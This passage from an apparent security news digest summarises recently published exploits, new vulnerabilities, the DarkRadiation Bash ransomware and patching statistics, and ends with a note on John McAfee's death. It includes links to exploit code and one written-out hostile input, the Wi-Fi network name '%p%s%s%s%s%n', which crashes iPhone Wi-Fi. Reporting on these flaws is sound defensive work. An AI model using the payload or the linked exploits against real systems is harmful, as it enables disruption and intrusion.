 2. [F5 BIG-IQ VE Post-auth Remote Root RCE](<https://vulners.com/packetstorm/PACKETSTORM:163264>). BIG-IQ provides a single point of management for all your BIG-IP devices — whether they are on premises or in a public or private cloud. It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. A good reason to check if you have this in the infrastructure. But of course the fact that this is post-auth makes it less interesting.
 3. [VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:163268>). From the description of the vulnerability that was published in February 2021: "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server." Therefore, if your IT colleagues have not patched vCenter since February, you can try to demonstrate how this vulnerability is exploited in practice.
 4. [Solaris SunSSH 11.0 Remote Root](<https://vulners.com/packetstorm/PACKETSTORM:163232>). "CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6." If you are still using Solaris in your infrastructure, this is a great opportunity to try this exploit.
 5. [Dlink DSL2750U - 'Reboot' Command Injection](<https://vulners.com/packetstorm/PACKETSTORM:163228>). There, in the exploit code, [there is a link to the full study](<https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20\(firmware%20version%201.6\)>) that shows how the researcher, Mohammed Hadi, gains admin access to the router. This is interesting considering that this router model is quite popular and you can still buy such a router.
 6. [It's 2021 and a printf format string in a wireless network's name can break iPhone Wi-Fi](<https://www.theregister.com/2021/06/21/wifi_ssid_flaw/>). On Friday, Carl Schou, a security researcher in Denmark, reported that his iPhone lost its Wi-Fi capability after attempting to connect to a Wi-Fi network named "%p%s%s%s%s%n". Fortunately, the damage appears not to be permanent. Apple iOS devices that lose Wi-Fi capability after being bitten by this bug can be restored via the General -> Reset -> Reset Network Settings menu option, which reverts network settings to their factory default. Not a very interesting vulnerability in terms of practical exploitation, but fun. Don't connect to unfamiliar Wi-Fi networks.

Now let's see some interesting new vulnerabilities.

 1. [Critical Palo Alto Cyber-Defense Bug Allows Remote ‘War Room’ Access](<https://threatpost.com/critical-palo-alto-bug-remote-war-room/167169/>). "A critical security bug in Palo Alto Networks’ Cortex XSOAR could allow remote attackers to run commands and automations in the Cortex XSOAR War Room and to take other actions on the platform, without having to log in. Found internally by Palo Alto, the bug (CVE-2021-3044) is an improper-authorization vulnerability that “enables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API,” according to the security vendor’s Tuesday advisory."
 2. [Cisco HyperFlex HX Auth Handling Remote Command Execution](<https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution>). Cisco HyperFlex HX Data Platform is a high-performance, extensible distributed file system that supports multiple hypervisors with a wide range of enterprise-grade data management and optimization services. If you have this in use, pay attention.
 3. "VMware has rolled out security updates to resolve a [critical flaw affecting Carbon Black App Control](<https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html>) that could be exploited to bypass authentication and take control of vulnerable systems." Carbon Black Protection (Cb App Control), formerly Bit9, is an application control product that allows departments to monitor and control application execution on systems.
 4. [NVIDIA Jetson Chipsets Found Vulnerable to High-severity Flaws](<https://thehackernews.com/2021/06/nvidia-jetson-chipsets-found-vulnerable.html>). The NVIDIA Jetson line consists of embedded Linux AI and computer vision compute modules and developer kits that primarily caters to AI-based computer vision applications and autonomous systems such as mobile robots and drones.
 5. On June 22, SonicWall published an advisory (SNWLID-2021-0006) to address an [incomplete fix for a vulnerability in its operating system](<https://www.tenable.com/blog/cve-2021-20019-sonicwall-fixes-incomplete-patch-for-cve-2020-5135>), SonicOS, used in a variety of SonicWall network security devices, including their SSL VPNs.

Malware:

 1. Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called ["DarkRadiation"](<https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html>) that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. "The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions," researchers from Trend Micro said in a report published last week. "The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."

Some statistics for your presentations:

 1. [Time to patch increases significantly during pandemic](<https://www.computerweekly.com/news/252502887/Time-to-patch-increases-significantly-during-pandemic>). "Among some of the headline findings in the data was a sharp decrease in the frequency with which disclosed vulnerabilities are patched in under 24 hours – which dropped from 20% last year to 9.9% today – despite new vulnerabilities or zero-days being quickly exploited by malicious actors, as has been seen in many cases, even before disclosure. The survey also found that about 60% of organisations take more than 72 hours to patch, and more than 20% take over 30 days, giving malicious actors a wide-open window to take advantage of the disclosed vulnerabilities to get inside target networks, establish persistence, steal data, and drop malware or ransomware."
 2. ['Set it and forget it' attitude to open-source software has become a major security problem, says Veracode](<https://www.theregister.com/2021/06/22/third_party_libraries_veracode/>). 92 per cent of the flaws discovered in third-party libraries could be fixed by simply updating to the latest version, with two-thirds of fixes being "minor and non-disruptive to the functionality of even the most complex software applications." The report also highlighted that a slim majority, 52 per cent, of developers claimed to have a formal process for the selection of third-party libraries, with a quarter saying they are either unsure or unaware of the existence of such a process, and that "security" is the third biggest concern when selecting a library – with "functionality" and "licensing" topping the leader board.

Promising topic:

 1. Google on Thursday [introduced a unified vulnerability schema for open source projects](<https://www.theregister.com/2021/06/24/google_security_fix/>), continuing its current campaign to shore up the security of open source software. A schema defines the structure of a database. It's a blueprint for the objects within the database and it informs how data can be queried and exchanged. As Google describes it, existing naming systems like the CPE Product Dictionary don't provide an easy way to automatically map a CVE vulnerability listing to a package name and a set of versions in a package manager. "With this schema we hope to define a format that all vulnerability databases can export." Well, let's keep an eye on this.

Well, it would probably be worth ending with the words about John McAfee.

[Anti-virus Pioneer John McAfee Found Dead in Spanish Prison Cell](<https://www.infosecurity-magazine.com/news/john-mcafee-found-dead-in-prison/>). I do not presume to say anything about the crimes of which he was accused. In any case, he was an information security legend and his whole life was cooler than any Hollywood blockbuster. I recommend watching videos on [his YouTube channel](<https://www.youtube.com/user/officialjohnmcafee>) about attack attribution and the current state of infrastructure security. He said some pretty unpopular things. And some of them are very interesting. The way it ended is of course very sad and tragic. RIP.